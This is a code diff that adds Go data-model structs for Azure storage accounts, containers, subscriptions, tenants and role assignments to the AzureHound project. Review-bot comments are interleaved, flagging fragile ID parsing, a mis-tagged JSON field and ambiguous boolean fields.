+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Contains information about SSH certificate public key and the path on the Linux VM where the public key is placed.
+type SshPublicKey struct {
+ // SSH public key certificate used to authenticate with the VM through ssh.
+ // The key needs to be at least 2048-bit and in ssh-rsa format.
+ // For creating ssh keys, see [Create SSH keys on Linux and Mac for Linux VMs in Azure](https://docs.microsoft.com/azure/virtual-machines/linux/create-ssh-keys-detailed).
+ KeyData string `json:"keyData,omitempty"`
+
+ // Specifies the full path on the created VM where ssh public key is stored.
+ // If the file already exists, the specified key is appended to the file. Example: /home/user/.ssh/authorized_keys
+ Path string `json:"path,omitempty"`
+}
diff --git a/models/azure/storage_account.go b/models/azure/storage_account.go
new file mode 100644
index 0000000..a422080
--- /dev/null
+++ b/models/azure/storage_account.go
@@ -0,0 +1,52 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "strings"
+
+type StorageAccount struct {
+ Entity
+
+ ExtendedLocation ExtendedLocation `json:"extendedLocation,omitempty"`
+ Identity ManagedIdentity `json:"identity,omitempty"`
+ Kind string `json:"kind,omitempty"`
+ Location string `json:"location,omitempty"`
+ Name string `json:"name,omitempty"`
+ Properties StorageAccountProperties `json:"properties,omitempty"`
+ Sku Sku `json:"sku,omitempty"`
+ Tags map[string]string `json:"tags,omitempty"`
+ Type string `json:"type,omitempty"`
+}
+
+func (s StorageAccount) ResourceGroupName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 4 {
+ return parts[4]
+ } else {
+ return ""
+ }
+}
+
+func (s StorageAccount) ResourceGroupId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 5 {
+ return strings.Join(parts[:5], "/")
+ } else {
+ return ""
+ }
+}
diff --git a/models/azure/storage_account_primary_endpoints.go b/models/azure/storage_account_primary_endpoints.go
new file mode 100644
index 0000000..889f8ec
--- /dev/null
+++ b/models/azure/storage_account_primary_endpoints.go
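Review bot: `ResourceGroupName` and `ResourceGroupId` pick the resource group purely by position (`parts[4]`, `parts[:5]`) and never check that `s.Id` has the `/subscriptions/<sub>/resourceGroups/<rg>/...` shape, so an ID without the leading slash or one scoped at another level returns an unrelated segment rather than `""`. A guard such as `if len(parts) > 4 && strings.EqualFold(parts[1], "subscriptions") && strings.EqualFold(parts[3], "resourceGroups")` would make both methods fail closed. The same positional parsing is repeated in models/azure/storage_container.go, where `StorageAccountName` and `StorageAccountId` additionally rely on index 8 and 9; one unexported helper shared by both types would keep the check in a single place. The `else` after each `return` can be dropped.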
@@ -0,0 +1,45 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type Endpoints struct {
+ Blob string `json:"blob,omitempty"`
+ DFS string `json:"dfs,omitempty"`
+ File string `json:"file,omitempty"`
+ InternetEndpoints StorageAccountInternetEndpoints `json:"internetEndpoints,omitempty"`
+ MicrosoftEndpoints StorageAccountMicrosoftEndpoints `json:"microsoftEndpoints,omitempty"`
+ Queue string `json:"queue,omitempty"`
+ Table string `json:"table,omitempty"`
+ Web string `json:"web,omitempty"`
+}
+
+type StorageAccountInternetEndpoints struct {
+ Blob string `json:"blob,omitempty"`
+ DFS string `json:"dfs,omitempty"`
+ File string `json:"file,omitempty"`
+ Web string `json:"web,omitempty"`
+}
+
+type StorageAccountMicrosoftEndpoints struct {
+ Blob string `json:"blob,omitempty"`
+ DFS string `json:"dfs,omitempty"`
+ File string `json:"file,omitempty"`
+ Queue string `json:"queue,omitempty"`
+ Table string `json:"table,omitempty"`
+ Web string `json:"web,omitempty"`
+}
diff --git a/models/azure/storage_account_props.go b/models/azure/storage_account_props.go
new file mode 100644
index 0000000..005c071
--- /dev/null
+++ b/models/azure/storage_account_props.go
@@ -0,0 +1,79 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type StorageAccountProperties struct {
+ AccessTier enums.StorageAccountAccessTier `json:"accessTier,omitempty"`
+ AllowBlobPublicAccess bool `json:"allowBlobPublicAccess,omitempty"`
+ AllowCrossTenantReplication bool `json:"allowCrossTenantReplication,omitempty"`
+ AllowSharedKeyAccess bool `json:"allowSharedKeyAccess,omitempty"`
+ AllowedCopyScope enums.AllowedCopyScope `json:"allowedCopyScope,omitempty"`
+ AzureFilesIdentityBasedAuthentication AzureFilesIdentityBasedAuthentication `json:"azureFilesIdentityBasedAuthentication,omitempty"`
+ BlobRestoreStatus BlobRestoreStatus `json:"blobRestoreStatus,omitempty"`
+ CreationTime string `json:"creationTime,omitempty"`
+ CustomDomain StorageAccountCustomDomain `json:"customDomain,omitempty"`
+ DefaultToOAuthAuthentication bool `json:"defaultToOAuthAuthentication,omitempty"`
+ DnsEndpointType enums.DnsEndpointType `json:"dnsEndpointType,omitempty"`
+ Encryption StorageAccountEncryptionProperties `json:"encryption,omitempty"`
+ FailoverInProgress bool `json:"failoverInProgress,omitempty"`
+ GeoReplicationStats GeoReplicationStats `json:"geoReplicationStats,omitempty"`
+ ImmutableStorageWithVersioning ImmutableStorageAccount `json:"immutableStorageWithVersioning,omitempty"`
+ IsHnsEnabled bool `json:"isHnsEnabled,omitempty"`
+ IsLocalUserEnabled bool `json:"isLocalUserEnabled,omitempty"`
+ IsNfsV3Enabled bool `json:"isNfsV3Enabled,omitempty"`
+ IsSftpEnabled bool `json:"isSftpEnabled,omitempty"`
+ KeyCreationTime StorageAccountKeyCreationTime `json:"keyCreationTime,omitempty"`
+ KeyPolicy StorageAccountKeyPolicy `json:"keyPolicy,omitempty"`
+ LargeFileSharesState enums.GenericEnabledDisabled `json:"largeFileSharesState,omitempty"`
+ LastGeoFailoverTime string `json:"lastGeoFailoverTime,omitempty"`
+ MinimumTlsVersion enums.MinimumTlsVersion `json:"minimumTlsVersion,omitempty"`
+ NetworkAcls NetworkRuleSet `json:"networkAcls,omitempty"`
+ PrimaryEndpoints Endpoints `json:"primaryEndpoints,omitempty"`
+ PrimaryLocation string `json:"primaryLocation,omitempty"`
+ PrivateEndpointConnections []PrivateEndpointConnection `json:"privateEndpointConnections"`
+ ProvisioningState enums.ProvisioningState `json:"provisioningState,omitempty"`
+ PublicNetworkAccess enums.GenericEnabledDisabled `json:"availabilitySet,omitempty"`
+ RoutingPreference RoutingPreference `json:"routingPreference,omitempty"`
+ SasPolicy SasPolicy `json:"sasPolicy,omitempty"`
+ SecondaryEndpoints Endpoints `json:"secondaryEndpoints,omitempty"`
+ SecondaryLocation string `json:"secondaryLocation,omitempty"`
+ StatusOfPrimary enums.AccountStatus `json:"statusOfPrimary,omitempty"`
+ StatusOfSecondary enums.AccountStatus `json:"statusOfSecondary,omitempty"`
+ StorageAccountSkuConversionStatus StorageAccountSkuConversionStatus `json:"storageAccountSkuConversionStatus,omitempty"`
+
+ SupportsHttpsTrafficOnly bool `json:"supportsHttpsTrafficOnly,omitempty"`
+}
+
+type StorageAccountCustomDomain struct {
+ Name string `json:"name,omitempty"`
+ UseSubDomainName bool `json:"useSubDomainName,omitempty"`
+}
+
+type StorageAccountKeyCreationTime struct {
+ Key1 string `json:"key1,omitempty"`
+ Key2 string `json:"key2,omitempty"`
+}
+
+type StorageAccountKeyPolicy struct {
+ KeyExpirationPeriodInDays int `json:"keyExpirationPeriodInDays,omitempty"`
+}
+
+type StorageAccountLargeFileSharesState struct {
+}
diff --git a/models/azure/storage_account_sku_conversion_status.go b/models/azure/storage_account_sku_conversion_status.go
new file mode 100644
index 0000000..5894de5
--- /dev/null
+++ b/models/azure/storage_account_sku_conversion_status.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type StorageAccountSkuConversionStatus struct {
+ EndTime string `json:"endTime,omitempty"`
+ SkuConversionStatus enums.SkuConversionStatus `json:"skuConversionStatus,omitempty"`
+ StartTime string `json:"startTime,omitempty"`
+ TargetSkuName enums.SkuName `json:"targetSkuName,omitempty"`
+}
diff --git a/models/azure/storage_container.go b/models/azure/storage_container.go
new file mode 100644
index 0000000..5a22612
--- /dev/null
+++ b/models/azure/storage_container.go
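Review bot: In `StorageAccountProperties` (models/azure/storage_account_props.go), `PublicNetworkAccess` carries the tag key `availabilitySet`, which looks like a copy-paste slip: a `publicNetworkAccess` value in the response is never decoded into this field, so every storage account reads as the zero value for a setting that describes its network exposure. The tag key should be `publicNetworkAccess`. Separately, `AllowBlobPublicAccess`, `AllowSharedKeyAccess` and `SupportsHttpsTrafficOnly` are plain `bool`, so a property the API omits cannot be told apart from an explicit `false`; if consumers of this data need that distinction (Azure documents an unset `allowSharedKeyAccess` as meaning allowed, as far as I know), declaring them as `*bool` preserves it. `PrivateEndpointConnections` is the only field in the struct without `omitempty`, and `StorageAccountLargeFileSharesState` is declared empty and not referenced anywhere in this hunk.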
@@ -0,0 +1,65 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "strings"
+
+type StorageContainer struct {
+ Entity
+
+ Type string `json:"type,omitempty"`
+ Name string `json:"name,omitempty"`
+ Etag string `json:"etag,omitempty"`
+ Properties StorageContainerProperties `json:"properties,omitempty"`
+}
+
+func (s StorageContainer) ResourceGroupName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 4 {
+ return parts[4]
+ } else {
+ return ""
+ }
+}
+
+func (s StorageContainer) ResourceGroupId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 5 {
+ return strings.Join(parts[:5], "/")
+ } else {
+ return ""
+ }
+}
+
+func (s StorageContainer) StorageAccountName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 8 {
+ return parts[8]
+ } else {
+ return ""
+ }
+}
+
+func (s StorageContainer) StorageAccountId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 9 {
+ return strings.Join(parts[:9], "/")
+ } else {
+ return ""
+ }
+}
diff --git a/models/azure/storage_container_legal_hold.go b/models/azure/storage_container_legal_hold.go
new file mode 100644
index 0000000..3c59ce3
--- /dev/null
+++ b/models/azure/storage_container_legal_hold.go
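Review bot: In storage_container.go, `ResourceGroupName`, `ResourceGroupId`, `StorageAccountName` and `StorageAccountId` take fixed positions out of `strings.Split(s.Id, "/")` without checking the keyword segment in front of them, so an Id of any other shape silently yields a wrong resource group or storage account rather than an empty string. These values presumably link a container to its parent in the collected data, so a mis-parsed Id would produce a wrong relationship with no error. Verifying the segment before indexing would close that gap, e.g. `if len(parts) > 4 && strings.EqualFold(parts[3], "resourceGroups") {` and the matching `parts[7]` check against `"storageAccounts"`. The four methods also repeat the same split; one unexported helper would keep the offsets in one place, and the `else` after each `return` can be dropped.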
@@ -0,0 +1,37 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type LegalHoldProperties struct {
+ HasLegalHold bool `json:"hasLegalHold,omitempty"`
+ ProtectedAppendWritesHistory ProtectedAppendWritesHistory `json:"protectedAppendWritesHistory,omitempty"`
+ Tags []TagProperty `json:"tags,omitempty"`
+}
+
+type ProtectedAppendWritesHistory struct {
+ AllowProtectedAppendWritesAll bool `json:"allowProtectedAppendWritesAll,omitempty"`
+ Timestamp string `json:"timestamp,omitempty"`
+}
+
+type TagProperty struct {
+ ObjectIdentifier string `json:"objectIdentifier,omitempty"`
+ Tag string `json:"tag,omitempty"`
+ TenantId string `json:"tenantId,omitempty"`
+ Timestamp string `json:"timestamp,omitempty"`
+ Upn string `json:"upn,omitempty"`
+}
diff --git a/models/azure/storage_container_props.go b/models/azure/storage_container_props.go
new file mode 100644
index 0000000..d22a34a
--- /dev/null
+++ b/models/azure/storage_container_props.go
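Review bot: In storage_container_legal_hold.go, `HasLegalHold` and `AllowProtectedAppendWritesAll` are plain `bool` fields tagged `omitempty`, so when the struct is marshalled a `false` value is dropped and a consumer cannot tell "disabled" from "not reported". The same pattern appears in storage_container_props.go (`Deleted`, `HasImmutabilityPolicy`, `HasLegalHold`), terminate_notification_profile.go (`Enable`), uefi_settings.go (`SecureBootEnabled`, `VTpmEnabled`), unified_role_definition.go (`IsBuiltIn`, `IsEnabled`) and user.go (`AccountEnabled`), where the `false` case is the security-relevant one. Either drop `omitempty` on these fields (tag `json:"hasLegalHold"`) or declare them `*bool` so all three states survive a round trip. Whether these models are re-serialised into the tool's output is not visible in these hunks, so confirm against the callers.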
@@ -0,0 +1,42 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type StorageContainerProperties struct {
+ DefaultEncryptionScope string `json:"defaultEncryptionScope,omitempty"`
+ Deleted bool `json:"deleted,omitempty"`
+ DeletedTime string `json:"deletedTime,omitempty"`
+ DenyEncryptionScopeOverride bool `json:"denyEncryptionScopeOverride,omitempty"`
+ EnableNfsV3AllSquash bool `json:"enableNfsV3AllSquash,omitempty"`
+ EnableNfsV3RootSquash bool `json:"enableNfsV3RootSquash,omitempty"`
+ HasImmutabilityPolicy bool `json:"hasImmutabilityPolicy,omitempty"`
+ HasLegalHold bool `json:"hasLegalHold,omitempty"`
+ ImmutabilityPolicy ImmutabilityPolicy `json:"immutabilityPolicy,omitempty"`
+ ImmutableStorageWithVersioning ImmutableStorageWithVersioning `json:"immutableStorageWithVersioning,omitempty"`
+ LastModifiedTime string `json:"lastModifiedTime,omitempty"`
+ LeaseDuration enums.LeaseDuration `json:"leaseDuration,omitempty"`
+ LeaseState enums.LeaseState `json:"leaseState,omitempty"`
+ LeaseStatus enums.LeaseStatus `json:"leaseStatus,omitempty"`
+ LegalHold LegalHoldProperties `json:"legalHold,omitempty"`
+ Metadata interface{} `json:"metadata,omitempty"`
+ PublicAccess enums.PublicAccess `json:"publicAccess,omitempty"`
+ RemainingRetentionDays int `json:"remainingRetentionDays,omitempty"`
+ Version string `json:"version,omitempty"`
+}
diff --git a/models/azure/storage_profile.go b/models/azure/storage_profile.go
new file mode 100644
index 0000000..5c9e2a5
--- /dev/null
+++ b/models/azure/storage_profile.go
@@ -0,0 +1,34 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies the storage settings for the virtual machine disks.
+type StorageProfile struct {
+ // Specifies the parameters that are used to add a data disk to a virtual machine.
+ // For more information about disks, see About disks and VHDs for Azure virtual machines.
+ DataDisks []DataDisk `json:"dataDisks,omitempty"`
+
+ // Specifies information about the image to use. You can specify information about platform images, marketplace
+ // images, or virtual machine images. This element is required when you want to use a platform image, marketplace
+ // image, or virtual machine image, but is not used in other creation operations.
+ ImageReference ImageReference `json:"imageReference,omitempty"`
+
+ // Specifies information about the operating system disk used by the virtual machine.
+ // For more information about disks, see About disks and VHDs for Azure virtual machines.
+ OSDisk OSDisk `json:"osDisk,omitempty"`
+}
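Review bot: In storage_container_props.go, `Metadata` is declared as `interface{}`, which decodes a JSON object into `map[string]interface{}` and forces every reader to type-assert before use. If the API returns container metadata as string name-value pairs, as it appears to, `map[string]string` with the same `json:"metadata,omitempty"` tag would be type-safe and match `Tags map[string]string` in subscription.go. This struct is also the only one in the hunk without field comments; a one-line comment on `PublicAccess` saying that it records the container's anonymous-access level would help readers who audit exposure.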
diff --git a/models/azure/sub_resource.go b/models/azure/sub_resource.go
new file mode 100644
index 0000000..37e5041
--- /dev/null
+++ b/models/azure/sub_resource.go
@@ -0,0 +1,23 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type SubResource struct {
+ // The resource ID.
+ Id string `json:"id,omitempty"`
+}
diff --git a/models/azure/subscription.go b/models/azure/subscription.go
new file mode 100644
index 0000000..b7f32c0
--- /dev/null
+++ b/models/azure/subscription.go
@@ -0,0 +1,51 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+type Subscription struct {
+ Entity
+
+ // The authorization source of the request. Valid values are one or more combinations of Legacy, RoleBased,
+ // Bypassed, Direct and Management. For example, 'Legacy, RoleBased'.
+ AuthorizationSource string `json:"authorizationSource,omitempty"`
+
+ // The subscription display name.
+ DisplayName string `json:"displayName,omitempty"`
+
+ // A list of tenants managing the subscription.
+ ManagedByTenants []ManagedByTenant `json:"managedByTenants,omitempty"`
+
+ // The subscription state.
+ State enums.SubscriptionState `json:"state,omitempty"`
+
+ // The subscription ID.
+ SubscriptionId string `json:"subscriptionId,omitempty"`
+
+ // The subscription policies.
+ SubscriptionPolicies SubscriptionPolicies `json:"subscriptionPolicies,omitempty"`
+
+ // The tags attached to the subscription.
+ Tags map[string]string `json:"tags,omitempty"`
+
+ // The subscription tenant ID.
+ TenantId string `json:"tenantId,omitempty"`
+}
diff --git a/models/azure/subscription_policies.go b/models/azure/subscription_policies.go
new file mode 100644
index 0000000..dec658f
--- /dev/null
+++ b/models/azure/subscription_policies.go
@@ -0,0 +1,33 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+// Subscription Policies
+type SubscriptionPolicies struct {
+ // The subscription location placement ID. The ID indicates which regions are visible for a subscription.
+ // For example, a subscription with a location placement Id of Public_2014-09-01 has access to Azure public regions.
+ LocationPlacementId string `json:"locationPlacementId,omitempty"`
+
+ // The subscription quota ID.
+ QuotaId string `json:"quotaId,omitempty"`
+
+ // The subscription spending limit.
+ SpendingLimit enums.SpendingLimit `json:"spendingLimit,omitempty"`
+}
diff --git a/models/azure/tenant.go b/models/azure/tenant.go
new file mode 100644
index 0000000..727e0c5
--- /dev/null
+++ b/models/azure/tenant.go
@@ -0,0 +1,38 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type Tenant struct {
+ Country string `json:"country,omitempty"` // Country/region name of the address for the tenant.
+ CountryCode string `json:"countryCode,omitempty"` // Country/region abbreviation for the tenant.
+ DefaultDomain string `json:"defaultDomain,omitempty"` // The default domain for the tenant.
+ DisplayName string `json:"displayName,omitempty"` // The display name of the tenant.
+ Domains []string `json:"domains,omitempty"` // The list of domains for the tenant
+ Id string `json:"id,omitempty"` // The fully qualified ID of the tenant. E.g. "/tenants/00000000-0000-0000-0000-000000000000"
+ TenantBrandingLogoUrl string `json:"tenantBrandingLogoUrl,omitempty"` // The tenant's branding logo URL. Only available for 'Home' TenantCategory
+ TenantCategory enums.TenantCategory `json:"tenantCategory,omitempty"` // The category of the tenant.
+ TenantId string `json:"tenantId,omitempty"` // Then tenant ID. E.g. "00000000-0000-0000-0000-000000000000"
+ TenantType string `json:"tenantType,omitempty"` // The tenant type. Only available for 'Home' TenantCategory
+}
+
+type TenantList struct {
+ NextLink string `json:"nextLink,omitempty"` // The URL to use for getting the next set of values.
+ Value []Tenant `json:"value"` // A list of tenants.
+}
diff --git a/models/azure/terminate_notification_profile.go b/models/azure/terminate_notification_profile.go
new file mode 100644
index 0000000..900d4b1
--- /dev/null
+++ b/models/azure/terminate_notification_profile.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type TerminateNotificationProfile struct {
+ // Specifies whether the Terminate Scheduled event is enabled or disabled.
+ Enable bool `json:"enable,omitempty"`
+
+ // Configurable length of time a Virtual Machine being deleted will have to potentially approve the
+ // Terminate Scheduled Event before the event is auto approved (timed out).
+ // The configuration must be specified in ISO 8601 format, the default value is 5 minutes (PT5M)
+ NotBeforeTimeout string `json:"notBeforeTimeout,omitempty"`
+}
diff --git a/models/azure/timezone_base.go b/models/azure/timezone_base.go
new file mode 100644
index 0000000..69019ef
--- /dev/null
+++ b/models/azure/timezone_base.go
@@ -0,0 +1,23 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type TimeZoneBase struct {
+ // The name of the time zone.
+ Name string `json:"name,omitempty"`
+}
diff --git a/models/azure/uefi_settings.go b/models/azure/uefi_settings.go
new file mode 100644
index 0000000..6d00da0
--- /dev/null
+++ b/models/azure/uefi_settings.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies the security settings like secure boot and vTPM used while creating the virtual machine.
+// Minimum api-version: 2020-12-01
+type UefiSettings struct {
+ // Specifies whether secure boot should be enabled on the virtual machine.
+ SecureBootEnabled bool `json:"secureBootEnabled,omitempty"`
+
+ // Specifies whether vTPM should be enabled on the virtual machine.
+ VTpmEnabled bool `json:"vTpmEnabled,omitempty"`
+}
diff --git a/models/azure/unified_role_assignment.go b/models/azure/unified_role_assignment.go
new file mode 100644
index 0000000..fc60a5f
--- /dev/null
+++ b/models/azure/unified_role_assignment.go
@@ -0,0 +1,76 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "encoding/json"
+
+type UnifiedRoleAssignment struct {
+ Entity
+
+ // Identifier of the role definition the assignment is for.
+ // Read only.
+ // Supports $filer (eq, in).
+ RoleDefinitionId string `json:"roleDefinitionId,omitempty"`
+
+ // Identifier of the principal to which the assignment is granted.
+ // Supports $filter (eq, in).
+ PrincipalId string `json:"principalId,omitempty"`
+
+ // Identifier of the directory object representing the scope of the assignment.
+ // Either this property or appScopeId is required.
+ // The scope of an assignment determines the set of resources for which the principal has been granted access.
+ // Directory scopes are shared scopes stored in the directory that are understood by multiple applications.
+ //
+ // Use / for tenant-wide scope.
+ // Use appScopeId to limit the scope to an application only.
+ //
+ // Supports $filter (eq, in).
+ DirectoryScopeId string `json:"directoryScopeId,omitempty"`
+
+ // Identifier of the resource representing the scope of the assignment.
+ ResourceScope string `json:"resourceScope,omitempty"`
+
